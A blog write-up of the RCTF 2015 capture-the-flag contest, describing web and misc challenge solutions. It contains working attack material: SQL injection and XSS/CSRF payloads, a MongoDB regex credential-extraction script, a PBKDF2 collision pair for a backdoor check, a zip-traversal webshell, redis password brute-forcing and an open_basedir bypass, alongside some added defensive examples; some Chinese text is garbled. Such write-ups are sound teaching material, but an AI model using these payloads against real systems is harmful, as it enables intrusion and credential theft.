LoRexxar's Blog

RCTF2015_writeup

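2015/11/17

This RCTF seems to be the first one ever held, and it is part of the XCTF league, so a lot of strong teams showed up. The challenges were built on wild ideas with extra difficulty forced on top (I guess the authors threw in every problem they could think of), and I have no idea what got into them. Either way, I learned quite a few injection techniques I had never seen before from the big pile of injection challenges, so here is the writeup...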

WEB

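WEB 100 upload (filename insert injection)

The page looks like this. After a little testing it turns out not to be an upload problem: after a successful upload the page displays the uploaded filename, so this should be an insert injection. Keywords such as and, select, union, from, sleep, benchmark, substring are filtered, but the filter can be bypassed with the scrscriptipt style of nesting.
Many of the approaches I tried at first gave no echo, so I gave up. Only after reading a writeup did I understand that the table structure is roughly
'filename','uid','uid'
and the uid columns only ever return numbers, so if the injection is not in the right position there is indeed no echo. Forcing the result into a number would also work, but there is a captcha, so it would take a very long time to get the flag. Once you know the correct table structure it is simple.

filename','uid','uid'),((database()),'uid','uid')

Continuing this way, you slowly get the flag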
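
An added example, not from the original write-up or the challenge source: why deleting blacklisted keywords in a single pass lets the nested spelling through, next to the same INSERT written with a bound parameter. SQLite stands in for the challenge's MySQL; the table layout follows the guess above, and the filter logic, the secrets table and the payload are constructed assumptions.

```python
import re
import sqlite3

# Keyword list from the write-up; how the real filter works is an assumption.
BLOCKED = ["and", "select", "union", "from", "sleep", "benchmark", "substring"]

# Constructed filename in the shape of the payload above, SQLite dialect.
PAYLOAD = "x.jpg', 1, 1), ((selselectect v frfromom secrets), 1, 1) --"


def strip_once(name):
    """Delete each blocked keyword in a single pass, never re-scanning."""
    for word in BLOCKED:
        name = re.sub(word, "", name, flags=re.IGNORECASE)
    return name


def insert_concat(db, filename):
    # Weak: the filtered name is spliced into the statement text.
    db.execute("INSERT INTO files VALUES ('%s', 1, 1)" % strip_once(filename))


def insert_bound(db, filename):
    # Hardened: the name is a bound parameter, so it is only ever data.
    db.execute("INSERT INTO files VALUES (?, 1, 1)", (filename,))


def stored_names(insert):
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE files (name TEXT, uid INT, uid2 INT)")
    db.execute("CREATE TABLE secrets (v TEXT)")
    db.execute("INSERT INTO secrets VALUES ('constructed-secret')")
    insert(db, PAYLOAD)
    return [r[0] for r in db.execute("SELECT name FROM files ORDER BY rowid")]


if __name__ == "__main__":
    print(stored_names(insert_concat))  # second row holds the secret
    print(stored_names(insert_bound))   # one row: the payload as literal text
```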

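WEB 150 weeeeeb3 (password-change logic flaw, IP spoofing, upload bypass)

The challenge looks like this. Poking around shows that changing the password takes two steps: once the check in the first step succeeds, you move on to the second step, which sets the new password

At this point you can intercept the request and change admin's password. At first I thought it had no effect, then realised that too many people were logging in, so you have to run a script to succeed.

After logging in, clicking message says the IP is wrong, so I modified XFF (X-Forwarded-For) and CI (Client-IP); after that the page shows the hint
<!-- index.php?module=filemanage&do=???-->
After trying things at random I found that upload worked and an upload page appeared. It still was not over; annoying, but I had to keep going...
Uploading something at random only gives the message You know what I want!
So it has to be PHP, which gives the message Something shows it is a php!
After that, whatever I tried I could not get <? through, so I gave up. From a writeup I learned a neat trick

(that actually works...) get flag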

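WEB 150 easysql (error-based injection, fancy bypass)

After logging in, the challenge looks like this

Registering with a " in the username makes the password change throw an error

That made it clear at once: error-based injection. Filtered: rand @ ` space order /*/ /! */ %20 %09 %0a %0b %0c %0d
So the traditional error-based techniques do not work, and every kind of whitespace is filtered as well, so limit cannot be used either. Here is the payload; I will write a separate article about error-based injection later.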

username=ddog"||updatexml(0x7c,concat((select(real_flag_1s_here)from(users)where(real_flag_1s_here)regexp('^R'))),1)#&password=123&email=123

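WEB 300 xss (link tag trick)

A huge number of tags are filtered, and this time upper/lower case variations and URL encoding are filtered too, so you have to find some special tag that is not filtered. My first idea was svg, but the base64-encoded payload kept containing "on", which is filtered, and it only works in Firefox while the challenge requires Chrome, so that was a dead end. After reading a writeup I learned about the link trick.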

<link rel="import" href="data:text/html;base64,PHNjcmlwdD5kZWxldGUgYWxlcnQ7YWxlcnQoIkhlbGxvIik7PC9zY3JpcHQ+">

That pops an alert. Looking through the page source, the idea is to send the message to admin so that an account gets registered under the admin account: a typical CSRF.

<!--only for admin
<form action="" method="post">
username:<input type="text" name="name"><br />
password:<input type="password" name="pass"><br />
<input type="radio" name="isadmin" value="0">user
<input type="radio" name="isadmin" value="1">admin<br />
<input type="hidden" name="token" value="34a1615ff3eaf616f7fa205a12792d27">
<input type="submit" name="adduser" value="adduser">
</form>-->

The writeup simply uses jQuery to issue a POST request that adds the user

<script src=http://180.76.178.54:8004/4b79f5d4860384d4ac494ad91f5313b7/js/jquery.js></script>
<script>
$.ajax({
    type: "post",
    url: "",
    data: "name=tomato123&pass=tomato123&isadmin=1&adduser=adduser&token="+$("input[name=token]").val()
})
</script>

Then build the payload

<link rel="import" href="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovLzE4MC43Ni4xNzguNTQ6ODAwNC80Yjc5ZjVkNDg2MDM4NGQ0YWM0OTRhZDkxZjUzMTNiNy9qcy9qcXVlcnkuanM+PC9zY3JpcHQ+CjxzY3JpcHQ+CiQuYWpheCh7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0eXBlOiAicG9zdCIsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1cmw6ICIiLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZGF0YTogIm5hbWU9dG9tYXRvMTIzJnBhc3M9dG9tYXRvMTIzJmlzYWRtaW49MSZhZGR1c2VyPWFkZHVzZXImdG9rZW49IiskKCJpbnB1dFtuYW1lPXRva2VuXSIpLnZhbCgpfSkKPC9zY3JpcHQ+">

Find admin.php, then log in to get the flag

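WEB 300 login (MongoDB injection plus a whole pile of other pitfalls)

I got stuck at the very first step here. I had heard of this kind of injection but never studied it, so first here is a reference on MongoDB injection
http://drops.wooyun.org/tips/3939
The script that extracts the account looks like this (I do not understand it yet, keeping it for later)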

<?php
ini_set("max_execution_time", 100);
echo 'start<br />';
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,'http://180.76.178.54:8005/53a0fb1b692f02436c3b5dda1db9c361/checkLogin.php');
curl_setopt ($ch, CURLOPT_HTTPHEADER , array("X-Requested-With: XMLHttpRequest"));
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_POST,1);
// Candidate characters tried at each position
$ori = '0123456789abcdefghijklmnopqrstuvwxyzQWERTYUIOPASDFGHJKLZXCVBNM_';
$str = '';
// Recover the username one character at a time with a $regex prefix match
for ($i=0; $i <40 ; $i++) {
    if($i > (strlen($str)+1) )
        break;
    for ($j=0; $j <strlen($ori) ; $j++) {
        $post = 'username[$regex]=/^'.$str.$ori[$j].'.*/&password[$ne]=admin';
        curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
        $data=curl_exec($ch);
        // The script treats a 104-byte response as "prefix matched"
        if (strlen($data) == 104) {
            $str.=$ori[$j];
            break;
        }
    }
}
$username = $str;
$str = '';
// Same loop for the password, with the recovered username fixed
for ($i=0; $i <40 ; $i++) {
    if($i > (strlen($str)+1) )
        break;
    for ($j=0; $j <strlen($ori) ; $j++) {
        $post = 'username='.$username.'&password[$regex]=/^'.$str.$ori[$j].'.*/';
        curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
        $data=curl_exec($ch);
        if (strlen($data) == 104) {
            $str.=$ori[$j];
            break;
        }
    }
}
$password = $str;
echo 'username='.$username."<br />";
echo 'password='.$password."<br />";
echo 'end!';
?>

This gives the account and password: ROIS_ADMIN pas5woRd_i5_45e2884c4e5b9df49c747e1d
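
An added example, not part of the original write-up or the challenge code: how form fields such as username[$regex] turn into query operators once the server parses them PHP-style, and the type check that stops it. The user record, the tiny matcher standing in for MongoDB and all function names are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl

USERS = [{"username": "demo_admin", "password": "constructed-pw"}]  # constructed


def php_style_fields(body):
    """Mimic PHP form parsing: key[sub]=v becomes {'key': {'sub': v}}."""
    fields = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[\]]+)\[([^\[\]]+)\]", key)
        if not m:
            fields[key] = value
            continue
        sub = fields.get(m.group(1))
        if not isinstance(sub, dict):
            sub = fields[m.group(1)] = {}
        sub[m.group(2)] = value
    return fields


def matches(stored, cond):
    """Stand-in for MongoDB matching: equality, $ne and $regex only."""
    if not isinstance(cond, dict):
        return stored == cond
    for op, arg in cond.items():
        if op == "$ne":
            ok = stored != arg
        elif op == "$regex":
            ok = re.search(arg.strip("/"), stored) is not None
        else:
            ok = False
        if not ok:
            return False
    return True


def login(body, require_strings):
    fields = php_style_fields(body)
    user, pw = fields.get("username"), fields.get("password")
    # Hardened path: anything that is not a plain string is refused outright.
    if require_strings and not (isinstance(user, str) and isinstance(pw, str)):
        return False
    return any(matches(u["username"], user) and matches(u["password"], pw)
               for u in USERS)
```

With require_strings off, the login answer depends on whether the submitted prefix matches, which is the yes/no signal the script above reads from the response length.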
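After logging in it looks like this

Download the backup file; it turns out to be a PHP class for extracting zip archives. I found the official version via Baidu and diffed the two
In the source I found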

$Agent = $_SERVER['HTTP_USER_AGENT'];
$backDoor = $_COOKIE['backdoor'];
$msg = json_encode("no privilege");
$iterations = 1000;
$salt = "roisctf";
$alg = "sha1";
$keylen = "20";
if ($Agent == $backDoor || strlen($Agent) != 65) {
    exit($msg);
}
if (substr($Agent,0,23) != "rois_special_user_agent") {
    exit($msg);
}
if (pbkdf2($alg, $Agent, $salt, $iterations, $keylen) != pbkdf2($alg, $backDoor, $salt, $iterations, $keylen)) {
    exit($msg);
}

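Testing shows that uploading a zip directly returns "no privilege"; the upload only goes through once the three conditions above are passed. The third condition is the hard one, so I googled pbkdf2 ctf

That led to PBKDF2+HMAC collision, at https://mathiasbynens.be/notes/pbkdf2-hmac
The article explains that collisions are possible here, i.e. different plaintexts produce the same output. I ran the script it provides and got one pair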

rois_special_user_agentaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaamipvkd
3-Rfm^Bq;ZZAcl]mS&eE

Then change the UA and add backdoor to the cookie, and the upload succeeds
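
An added example, not from the write-up or the linked article: the property behind the third condition, shown with the salt, iteration count and key length of the check above. HMAC replaces a key longer than the hash block (64 bytes for SHA-1, one less than the required 65) with its digest, so two different inputs can be the same key; the function names and the 65-byte value are constructed assumptions.

```python
import hashlib
import hmac

# Parameters copied from the backdoor check above.
SALT, ITERATIONS, KEYLEN = b"roisctf", 1000, 20
BLOCK = hashlib.sha1().block_size  # 64 bytes


def derive(password):
    return hashlib.pbkdf2_hmac("sha1", password, SALT, ITERATIONS, KEYLEN)


def hmac_key(password):
    """The key HMAC-SHA1 actually uses: inputs longer than one block are
    replaced by their SHA-1 digest, then everything is zero-padded to 64."""
    if len(password) > BLOCK:
        password = hashlib.sha1(password).digest()
    return password.ljust(BLOCK, b"\0")


def equivalent(a, b):
    """True when a and b are the same secret as far as PBKDF2-HMAC-SHA1 goes."""
    return hmac.compare_digest(hmac_key(a), hmac_key(b))


def constructed_pair():
    # Constructed 65-byte value with the prefix and length the check demands.
    agent = b"rois_special_user_agent" + b"a" * 42
    return agent, hashlib.sha1(agent).digest()
```

A check that two client-supplied values derive to the same key therefore proves nothing about knowledge of a secret; comparing one derived value against a server-side constant avoids the problem.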

Extracted files are named md5(filename + RoisFighting).extension, but requesting http://180.76.178.54:8005/53a0fb1b692f02436c3b5dda1db9c361/upload/image/051ee28a1964f9f2779d32f2e48212cb/70d08f9380da3a6e0440b3266a2a39f6.php shows that the file does not exist. Testing shows that the files are deleted right after extraction, so we can try to build a shell that is extracted into the parent directory

The shell address is then http://180.76.178.54:8005/53a0fb1b692f02436c3b5dda1db9c361/upload/image/382aef24b11f8c5222bc58062a9bf5c7.php
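
An added example, not part of the write-up or the challenge's zip class: the check an extraction routine needs so that no archive member can land outside its per-upload directory, where the clean-up described above never looks. The archive contents, the directory and the function names are constructed assumptions.

```python
import io
import os
import zipfile


def escaping_members(archive_bytes, dest):
    """Names in the archive that resolve outside dest when joined to it."""
    dest = os.path.realpath(dest)
    bad = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for name in zf.namelist():
            target = os.path.realpath(os.path.join(dest, name))
            if os.path.commonpath([dest, target]) != dest:
                bad.append(name)
    return bad


def constructed_archive():
    # Constructed sample: one ordinary member, one that climbs a directory.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("ok.png", b"constructed")
        zf.writestr("../up.txt", b"constructed")
    return buf.getvalue()
```

An upload handler would reject the whole archive when this list is not empty, before writing anything to disk.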

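I do not understand the rest anyway, so I am just dumping it all here

WEB 500 (official writeup pasted in)

1. Guessing directories turns up the 1.sql database backup file, which shows that the admin user's password is admin, the username field has length 16 and the password field has length 32. Testing shows that long-string truncation can be used, admin 1 (length greater than 16) and admin 1 (length greater than 32), to bypass the restriction that admin cannot log in.

2. Log in to the back end, which shows admin's information. View the source; according to the hint, the way forward is social engineering, i.e. the password of some service has to be cracked. An nmap scan finds the port of a redis service, so the redis password is what has to be brute-forced.

3. Write a script to brute-force the redis password. From the admin information above, a lookup in a leaked-credential database shows the gmail password is rkr4me, but that is not his real password. Combining this with the other information, write a script that generates a wordlist from the keywords.
Wordlist generation script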

#!/usr/bin/env python
import itertools

fp = open('social.txt', 'w')
keyword = ['JiaoXiaoMing', 'jiaoxiaoming', 'jxm', 'Jxm', 'JXM', '19960708', '960708', '0708', 'rkr4me']
# Every ordered combination of 1 to 8 keywords, one candidate per line
for i in range(1, 9):
    for e in itertools.permutations(keyword, i):
        st = ''.join(e)
        fp.write(st + '\n')
fp.close()

Password brute-force script

#!/usr/bin/env python
import redis

fo = open('social.txt', 'r')
for line in fo.readlines():
    line = line.strip('\n').strip()
    r = redis.Redis(host='180.76.178.50', port=6379, db=0, password=line)
    try:
        # info() raises when authentication fails
        r.info()
    except Exception as e:
        # print(e)
        continue
    else:
        print(line)
        break
fo.close()

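The password finally brute-forced is Jxm0960708rkr4me

4. Connect to redis. Getting a shell through redis requires the web root path, so a way to obtain it is needed. Errors do not echo the site path, so another method is required. The site has no phpinfo file either. The login.php~ backup file reveals the path internal.php, but it cannot be accessed; since it is an internal test system, it is probably restricted by IP. Spoofing Client-ip: 127.0.0.1 gets into the internal.php page, which has a test interface.

CSRF naturally comes to mind. The csrf filters some content; after repeated debugging and payload construction you arrive at a form like http://a@127.0.0.1.xip.io:80, i.e. it has to contain xxx@ and xip.io:port to get past the filter (there were some bugs earlier on that let the experts bypass it more easily). Then use the csrf to scan ports and paths, which finds port 8080; the payload looks like http://abc@127.0.0.1.xip.io:8080/index.php
This returns the deployment hint inside: the actual site is deployed under the he1m4n6a directory. The 8080 home page is phpinfo output, which gives the real site path /var/www/rois/he1m4n6a

5. Set the path in Redis and get a shell; the root directory turns out to be inaccessible. This is presumably the open_basedir setting, so upload a PHP file that bypasses open_basedir and lists all files in the root directory. One file name in the root directory, rctf{xxx}, is the flag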

<?php $file_list = array();
// The glob:// wrapper lists entries under / (visible, then dot files)
$it = new DirectoryIterator("glob:///*");
foreach($it as $f) {
    $file_list[] = $f->__toString();
}
$it = new DirectoryIterator("glob:///.*");
foreach($it as $f) {
    $file_list[] = $f->__toString();
}
sort($file_list);
foreach($file_list as $f) {
    echo file_get_contents($f);
    echo "{$f}<br/>";
}
?>

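6. A script runs automatically in the background on the server and deletes unrelated files at intervals, so you have to write a script that keeps uploading the webshell, or write the webshell into memory, or simply be quick with your hands..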

MISC

MISC 10

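The fancy-keyboard puzzle that 360 has used before. Not much to it, and there were a few fake flags as well; honestly this kind of trick is especially boring, and it also affected

MISC 50 log analysis

A rather interesting challenge. At first I was wondering whether something else was needed, then found that it is actually the log of sqlmap extracting a password, and the flag can be recovered by analysing the log
http://pan.baidu.com/s/1i3vuGUL(pipo)
Script attached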

from urllib.parse import unquote

log = open('log_flag.log', 'r')
log2 = open('log_flag_urldecode2.log', 'w')
for eachLine in log:
    # URL-decode everything after the id= parameter
    pos = eachLine.find('id=')
    result = unquote(eachLine[pos+3:])
    # Keep the number compared with "!=", up to the following "),S"
    if result.find('!=') != -1:
        log2.write(result[result.find('!=')+2:result.find('),S')] + ',')
log.close()
log2.close()
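
An added example, not from the original post: the same log analysis carried one step further, keeping the character position next to each "!=" value so the extracted string can be rebuilt in order. The log lines are constructed, and the payload shape (a position argument before ",1))" and a "!=" probe confirming each character) is an assumption modelled on the markers the script above slices on.

```python
import re
from urllib.parse import quote, unquote

# ",<position>,1))!=<code>),S": the pieces the script above slices on.
PROBE = re.compile(r",(\d+),1\)\)!=(\d+)\),S")


def sample_line(pos, op, code):
    """Build one constructed access-log line (payload shape is an assumption)."""
    payload = "1 AND 7=IF((ORD(MID((SELECT flag),%d,1))%s%d),SLEEP(1),7)" % (pos, op, code)
    return '10.0.0.5 "GET /?id=%s HTTP/1.1" 200' % quote(payload, safe="")


# Constructed log: ">" probes narrow a character down, "!=" confirms it.
SAMPLE_LOG = "\n".join([
    sample_line(2, ">", 96), sample_line(2, "!=", 116),
    sample_line(1, ">", 64), sample_line(1, "!=", 99),
    sample_line(3, ">", 110), sample_line(3, "!=", 102),
    '10.0.0.9 "GET /favicon.ico HTTP/1.1" 404',
])


def recover(log_text):
    """Rebuild the extracted string from the "!=" probes, ordered by position."""
    chars = {}
    for line in log_text.splitlines():
        pos = line.find("id=")
        if pos == -1:
            continue  # not a request to the injectable parameter
        m = PROBE.search(unquote(line[pos + 3:]))
        if m:
            chars[int(m.group(1))] = chr(int(m.group(2)))
    return "".join(chars[i] for i in sorted(chars))


if __name__ == "__main__":
    print(recover(SAMPLE_LOG))
```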

MISC 100 (fancy guess-the-idea ciphertext)

http://pan.baidu.com/s/1jG95P90(8flk)

娌¤閿欑殑璇濇墦寮鏄紶鍥剧墖锛屽紑濮嬩互涓烘槸鏈夐殣鍐欙紝鍚庢潵鍦ㄧ綉涓婃壘鍒颁簡鍘熷浘锛屽姣斿彂鐜版瘺鍖哄埆閮芥病鏈夛紝鍙湁鍦‥XIF淇℃伅涓壘鍒
GMYDGMJTGEZTCMZQGMYDGMJTGEZTAMZRGMYTGMJTGEZTCMZRGMYTGMBTGAZTAMZRGMYDGMJTGEZTCMZRGMYTGMBTGAZTCMZQGMYDGMJTGAZTCMZRGMYTGMBTGEZTCMZRGMYTGMJTGEZTAMZRGMYTGMBTGAZTCMZQGMYTGMBTGAZTAMZRGMYTGMBTGEZTCMZRGMYDGMJTGEZTCMZQGMYTGMJTGAZTAMZRGMYDGMJTGEZTCMZQGMYTGMBTGEZTAMZQGMYTGMBTGAZTCMZQGMYTGMJTGEZTCMZQGMYDGMBTGEZTCMZRGMYDGMJTGAZTCMZQGMYTGMBTGAZTCMZQGMYDGMJTGAZTCMZRGMYDGMBTGAZTCMZRGMYTGMBTGEZTCMZQGMYTGMBTGAZTCMZQGMYDGMBTGEZTAMZRGMYTGMBTGEZTAMZRGMYTGMJTGAZTCMZQGMYDGMJTGAZTCMZQGMYTGMJTGEZTAMZRGMYTGMBTGAZTCMZQGMYTGMJTGEZTCMZQGMYDGMBTGEZTAMZQGMYTGMJTGEZTAMZRGMYDGMJTGEZTAMZRGMYDGMJTGAZTCMZRGMYDGMBTGEZTAMZQGMYTGMBTGAZTCMZQGMYTGMJTGEZTAMZRGMYTGMJTGAZTAMZRGMYTGMJTGEZTCMZQGMYDGMJTGAZTAMZRGMYDGMJTGAZTAMZQGMYTGMJTGEZTAMZRGMYTGMBTGAZTCMZQGMYTGMJTGEZTAMZRGMYTGMJTGAZTCMZRGMYDGMJTGEZTCMZQGMYDGMJTGAZTAMZRGMYDGMJTGAZTAMZRGMYDGMBTGAZTCMZRGMYTGMJTGAZTCMZQGMYTGMBTGEZTCMZQGMYDGMJTGAZTCMZQGMYDGMBTGAZTCMZQGMYDGMJTGEZTAMZR

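At first I kept thinking it was Playfair, an all-uppercase cipher; it turned out to be base32, which decodes to a bunch of 3130. Decoding that once more as hex gives a string of 0s and 1s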
0111001101111111000101111100100101110111111011001010001101110111011001011101010010010111100011101010100100101100011101101001000101101011101001010111011001011110001001110101101010110010010010111011100111110010010100011101100101110111011011100100101001000111101010110010100001001101
鍙儨280浣嶏紝娌″姙娉曞紑鏂癸紝鎵浠ュ簲璇ヤ笉鏄簩缁寸爜锛屾兂鍒7浣嶄竴缁勶紝浣嗘槸鍥犱负瀛楃闆嗕笉鍙畾锛屾墍浠ユ渶鍚庢病瑙e嚭鏉ワ紝鏈鍚庣瓑绛墂riteup鍚

MISC 200

At this point I still do not know what this misc challenge is about, so I am setting it aside for now
http://pan.baidu.com/s/1mgzsu5E(yi4v)

MISC 300

http://pan.baidu.com/s/1bncAdw7(yv6o)
